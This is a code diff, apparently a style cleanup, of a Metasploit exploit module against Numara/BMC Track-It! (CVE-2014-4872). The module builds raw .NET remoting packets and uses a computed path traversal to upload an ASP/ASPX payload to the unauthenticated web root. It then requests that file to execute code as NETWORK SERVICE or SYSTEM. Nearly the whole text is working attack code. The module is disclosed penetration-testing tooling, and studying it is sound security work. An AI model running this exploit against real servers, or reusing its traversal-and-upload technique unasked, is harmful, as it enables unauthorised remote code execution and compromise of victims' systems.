@@ -10,59 +10,64 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Numara / BMC Track-It! FileStorageService Arbitrary File Upload',
-      'Description'    => %q{
-        This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!
-        v8 to v11.X.
-        The application exposes the FileStorageService .NET remoting service on port 9010
-        (9004 for version 8) which accepts unauthenticated uploads. This can be abused by
-        a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary
-        code execution as NETWORK SERVICE or SYSTEM.
-        This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,
-        10.0.0.143, 9.0.30.248 and 8.0.2.51.
-      },
-      'Author'         =>
-        [
-          'Pedro Ribeiro <pedrib[at]gmail.com>'    # vulnerability discovery and MSF module
+    super(
+      update_info(
+        info,
+        'Name' => 'Numara / BMC Track-It! FileStorageService Arbitrary File Upload',
+        'Description' => %q{
+          This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!
+          v8 to v11.X.
+          The application exposes the FileStorageService .NET remoting service on port 9010
+          (9004 for version 8) which accepts unauthenticated uploads. This can be abused by
+          a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary
+          code execution as NETWORK SERVICE or SYSTEM.
+          This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,
+          10.0.0.143, 9.0.30.248 and 8.0.2.51.
+        },
+        'Author' => [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # vulnerability discovery and MSF module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2014-4872' ],
           [ 'OSVDB', '112741' ],
           [ 'US-CERT-VU', '121036' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2014/Oct/34' ]
         ],
-      'DefaultOptions' => { 'WfsDelay' => 30 },
-      'Platform'       => 'win',
-      'Arch'           => ARCH_X86,
-      'Targets'        =>
-        [
+        'DefaultOptions' => { 'WfsDelay' => 30 },
+        'Platform' => 'win',
+        'Arch' => ARCH_X86,
+        'Targets' => [
           [ 'Numara / BMC Track-It! v9 to v11.X - Windows', {} ],
         ],
-      'Privileged'     => false,
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2014-10-07'
-    ))
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2014-10-07',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         OptPort.new('RPORT',
-          [true, 'TrackItWeb application port', 80]),
+                    [true, 'TrackItWeb application port', 80]),
         OptPort.new('RPORT_REMOTING',
-          [true, '.NET remoting service port', 9010]),
+                    [true, '.NET remoting service port', 9010]),
         OptInt.new('SLEEP',
-          [true, 'Seconds to sleep while we wait for ASP(X) file to be written', 15]),
+                   [true, 'Seconds to sleep while we wait for ASP(X) file to be written', 15]),
         OptString.new('TARGETURI',
-          [true, 'Base path to the TrackItWeb application', '/TrackItWeb/'])
-      ])
+                      [true, 'Base path to the TrackItWeb application', '/TrackItWeb/'])
+      ]
+    )
   end
 
-
   def get_version
     res = send_request_cgi!({
-      'uri'    => normalize_uri(datastore['TARGETURI']),
+      'uri' => normalize_uri(datastore['TARGETURI']),
       'method' => 'GET'
     })
     if res and res.code == 200 and res.body.to_s =~ /\/TrackItWeb\/Content\.([0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,4})\//
@@ -71,13 +76,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
   def check
     version = get_version
     if version != nil
       if (version[0].to_i < 11) or
-      (version[0].to_i == 11 and version[1].to_i <= 3) or
-      (version[0].to_i == 11 and version[1].to_i == 3 and version[2].to_i == 0 and version[3].to_i < 999)
+         (version[0].to_i == 11 and version[1].to_i <= 3) or
+         (version[0].to_i == 11 and version[1].to_i == 3 and version[2].to_i == 0 and version[3].to_i < 999)
         ctx = { 'Msf' => framework, 'MsfExploit' => self }
         sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
         if not sock.nil?
@@ -86,6 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
           if res =~ /Tcp channel protocol violation: expecting preamble/
             return Exploit::CheckCode::Appears
           end
+
           sock.close
         end
       else
@@ -95,19 +100,17 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown
   end
 
-
   def longest_common_substr(strings)
     shortest = strings.min_by &:length
     maxlen = shortest.length
     maxlen.downto(0) do |len|
       0.upto(maxlen - len) do |start|
-        substr = shortest[start,len]
-        return substr if strings.all?{|str| str.include? substr }
+        substr = shortest[start, len]
+        return substr if strings.all? { |str| str.include? substr }
       end
     end
   end
 
-
   def get_traversal_path
     #
     # ConfigurationService packet structure:
@@ -136,9 +139,9 @@ class MetasploitModule < Msf::Exploit::Remote
       0x00, 0x15, 0x11, 0x00, 0x00, 0x00, 0x12
     ]
 
-    service = "TrackIt.Core.ConfigurationService".gsub(/TrackIt/,(@version == 11 ? "Trackit" : "Numara.TrackIt"))
-    method = "GetProductDeploymentValues".gsub(/TrackIt/,(@version == 11 ? "Trackit" : "Numara.TrackIt"))
-    type = "TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
+    service = "TrackIt.Core.ConfigurationService".gsub(/TrackIt/, (@version == 11 ? "Trackit" : "Numara.TrackIt"))
+    method = "GetProductDeploymentValues".gsub(/TrackIt/, (@version == 11 ? "Trackit" : "Numara.TrackIt"))
+    type = "TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/, (@version == 11 ? "TrackIt" : "Numara.TrackIt"))
 
     uri = "tcp://" + rhost + ":" + @remoting_port.to_s + "/" + service
 
@@ -200,16 +203,17 @@ class MetasploitModule < Msf::Exploit::Remote
     file_storage_dir = nil
     while counter < datastore['SLEEP']
       begin
-        readable,writable,error = IO.select([sock], nil, nil, datastore['SLEEP'] / 2)
+        readable, writable, error = IO.select([sock], nil, nil, datastore['SLEEP'] / 2)
         if readable == nil
           break
         else
           sock = readable[0]
         end
+
         buf_reply = sock.readpartial(4096)
         if (index = (buf_reply.index(file_storage_dir_str))) != nil
           # after file_storage_dir_str, discard 5 bytes then get file_storage_dir_size
-          size = buf_reply[index + file_storage_dir_str.length + 5,1].unpack('C*')[0]
+          size = buf_reply[index + file_storage_dir_str.length + 5, 1].unpack('C*')[0]
           file_storage_dir = buf_reply[index + file_storage_dir_str.length + 6, size]
           if file_storage_dir != nil and web_data_dir != nil
             break
@@ -217,7 +221,7 @@ class MetasploitModule < Msf::Exploit::Remote
         end
         if (index = (buf_reply.index(web_data_dir_str))) != nil
           # after web_data_dir_str, discard 5 bytes then get web_data_dir_size
-          size = buf_reply[index + web_data_dir_str.length + 5,1].unpack('C*')[0]
+          size = buf_reply[index + web_data_dir_str.length + 5, 1].unpack('C*')[0]
           web_data_dir = buf_reply[index + web_data_dir_str.length + 6, size]
           if file_storage_dir != nil and web_data_dir != nil
             break
@@ -237,11 +241,11 @@ class MetasploitModule < Msf::Exploit::Remote
       # which is the path accessible without authentication.
       # On the file_storage_dir, add the IncidentRepository part where the files land by default.
       # We then find the common string and calculate the traversal_path.
-      web_data_dir = web_data_dir[0,web_data_dir.rindex("\\")] + "\\Web\\Installers\\"
+      web_data_dir = web_data_dir[0, web_data_dir.rindex("\\")] + "\\Web\\Installers\\"
       file_storage_dir << "\\Repositories\\IncidentRepository"
       common_str = longest_common_substr([file_storage_dir, web_data_dir])
-      traversal_size =  file_storage_dir[common_str.rindex("\\"), file_storage_dir.length].scan("\\").length
-      traversal_path = "..\\" * traversal_size + web_data_dir[common_str.rindex("\\") + 1,common_str.length]
+      traversal_size = file_storage_dir[common_str.rindex("\\"), file_storage_dir.length].scan("\\").length
+      traversal_path = "..\\" * traversal_size + web_data_dir[common_str.rindex("\\") + 1, common_str.length]
       return traversal_path
     else
       return nil
@@ -249,7 +253,6 @@ class MetasploitModule < Msf::Exploit::Remote
     # Note: version 8 always returns nil as the GetProductDeploymentValues does not exist
   end
 
-
   def send_file(traversal_path, filename, file_content)
     #
     # FileStorageService packet structure:
@@ -321,12 +324,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     packet_body_pre_filecontent = [ 0x02 ]
 
-    service = "TrackIt.Core.FileStorageService".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
+    service = "TrackIt.Core.FileStorageService".gsub(/TrackIt/, (@version == 11 ? "TrackIt" : "Numara.TrackIt"))
     method = "Create"
-    type = "TrackIt.Core.FileStorage.IFileStorageSecureDelegator, TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
+    type = "TrackIt.Core.FileStorage.IFileStorageSecureDelegator, TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/, (@version == 11 ? "TrackIt" : "Numara.TrackIt"))
     repository = "IncidentRepository"
-    binary_lib = "TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
-    file_content_decl = "TrackIt.Core.FileStorage.FileContent".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
+    binary_lib = "TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/, (@version == 11 ? "TrackIt" : "Numara.TrackIt"))
+    file_content_decl = "TrackIt.Core.FileStorage.FileContent".gsub(/TrackIt/, (@version == 11 ? "TrackIt" : "Numara.TrackIt"))
 
     uri = "tcp://" + rhost + ":" + @remoting_port.to_s + "/" + service
 
@@ -429,9 +432,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # We can't really register our files for cleanup as most of the time we run under the IIS user, not SYSTEM
   end
 
-
   def exploit
-    @packet_header_pre_packet_size= [
+    @packet_header_pre_packet_size = [
       0x2e, 0x4e, 0x45, 0x54, 0x01, 0x00, 0x00, 0x00,
       0x00, 0x00
     ]
@@ -499,7 +501,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Executing payload")
     res = send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], "Installers", filename),
+      'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename),
       'method' => 'GET'
     })
 
@@ -521,13 +523,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
         print_status("Executing payload")
         res = send_request_cgi({
-          'uri'    => normalize_uri(datastore['TARGETURI'], "Installers", filename),
+          'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename),
           'method' => 'GET'
         })
       end
     end
     if not res or res.code != 200
-      fail_with(Failure::Unknown, "#{peer} - Could not execute payload" + (res ? ", got HTTP code #{res.code.to_s}": ""))
+      fail_with(Failure::Unknown, "#{peer} - Could not execute payload" + (res ? ", got HTTP code #{res.code.to_s}" : ""))
     end
 
     handler
